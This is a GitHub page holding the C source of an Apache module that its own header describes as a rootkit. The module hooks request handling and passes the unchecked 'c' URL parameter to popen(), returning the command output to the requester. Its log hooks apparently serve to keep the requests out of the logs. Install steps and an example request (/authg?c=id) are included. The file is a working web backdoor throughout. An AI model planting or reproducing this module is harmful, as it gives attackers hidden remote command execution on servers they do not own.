-
Notifications
You must be signed in to change notification settings - Fork 36
/
mod_authg.c
98 lines (92 loc) · 2.67 KB
/
mod_authg.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
/*
** mod_authg.c -- Apache module rootkit C. Papathanasiou (2015)
** [Semi-Autogenerated via ``apxs -n authg -g'']
**
** To play with this module first compile it into a
** DSO file and install it into Apache's modules directory
** by running:
**
** $ apxs -c -i mod_authg.c
**
** Then activate it in Apache's apache2.conf file for instance
** for the URL /authg in as follows:
**
** # apache2.conf
** LoadModule authg_module modules/mod_authg.so
** <Location /authg>
** SetHandler authg
** </Location>
**
** Then after restarting Apache via
**
** $ apachectl restart
**
** you immediately can request the URL /authg?c=cmd and watch for the
** output of this module. This can be achieved for instance via:
**
** $ lynx -mime_header http://localhost/authg?c=id
**
** The output should be similar to the following one:
**
** HTTP/1.1 200 OK
** Date: Thu, 19 Feb 2015 16:33:30 GMT
** Server: Apache/2.4.7 (Ubuntu)
** Content-Length: 54
** Connection: close
** Content-Type: text/html
**
** uid=33(www-data) gid=33(www-data) groups=33(www-data)
**
*/
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "http_log.h"
#include "ap_config.h"
#include <stdio.h>
#include <stdlib.h>
static int authg_handler(request_rec *r)
{
apr_table_t *GET;
apr_array_header_t *POST;
const char *c;
FILE *fp;
char path[1024];
if (strcmp(r->handler, "authg")) {
return DECLINED;
}
ap_args_to_table(r, &GET);
ap_parse_form_data(r, NULL, &POST, -1, 8192);
ap_set_content_type(r, "text/html");
c = apr_table_get(GET, "c");
fp = popen(c,"r");
if (fp == NULL) {
return OK;
}
while (fgets(path, sizeof(path)-1,fp) != NULL) {
ap_rprintf(r,"%s",path);
}
pclose(fp);
return OK;
}
static int log_handler(request_rec *r) {
return DECLINED;
}
static int log_open_handler(request_rec *r) {
return DECLINED;
}
static void authg_register_hooks(apr_pool_t *p)
{
ap_hook_handler(authg_handler, NULL, NULL, APR_HOOK_MIDDLE);
ap_hook_open_logs(log_open_handler,NULL,NULL,APR_HOOK_MIDDLE);
ap_hook_log_transaction(log_handler,NULL,NULL,APR_HOOK_MIDDLE);
}
module AP_MODULE_DECLARE_DATA authg_module = {
STANDARD20_MODULE_STUFF,
NULL, /* create per-dir config structures */
NULL, /* merge per-dir config structures */
NULL, /* create per-server config structures */
NULL, /* merge per-server config structures */
NULL, /* table of config file commands */
authg_register_hooks /* register hooks */
};